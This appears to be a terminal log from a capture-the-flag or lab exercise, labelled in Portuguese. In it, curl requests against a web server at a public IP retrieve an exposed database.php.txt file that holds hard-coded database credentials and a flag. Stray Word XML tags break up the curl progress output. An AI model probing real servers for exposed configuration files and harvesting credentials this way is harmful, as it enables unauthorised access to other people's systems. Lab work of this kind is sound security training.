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└─$ curl 98.95.207.28/config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 PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;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&lt;html&gt;&lt;head&gt;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&lt;title&gt;301 Moved Permanently&lt;/title&gt;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&lt;/head&gt;&lt;body&gt;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&lt;h1&gt;Moved Permanently&lt;/h1&gt;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&lt;p&gt;The document has moved &lt;a href="http://98.95.207.28/config/"&gt;here&lt;/a&gt;.&lt;/p&gt;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&lt;address&gt;Apache/2.4.54 (Debian) Server at 98.95.207.28 Port 80&lt;/address&gt;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└─$ curl 98.95.207.28/config/database.php.txt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FLAG BÁSICA: Credenciais em código fonte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$db_host = 'db';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$db_user = 'techcorp_user';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$db_pass = 'T3chC0rp_S3cr3t_2024!';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$db_name = 'techcorp_db';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$conn = mysqli_connect($db_host, $db_user, $db_pass, $db_name);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(!$conn)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die("Connection failed: " . mysqli_connect_error());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FLAG{d4t4b4s3_cr3d3nt14ls_3xp0s3d}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└─$ curl 98.95.207.28/config/database.php.txt | grep FLAG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% Total</w:t>
        <w:tab/>
        <w:t xml:space="preserve">% Received % Xferd  Average Speed   Time</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time  Current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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Dload  Upload   Total   Spent</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Left  Speed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100   340  100   340</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0   1116  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0 --:--:-- --:--:-- --:--:--  1118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FLAG BÁSICA: Credenciais em código fonte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// FLAG{d4t4b4s3_cr3d3nt14ls_3xp0s3d}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└─$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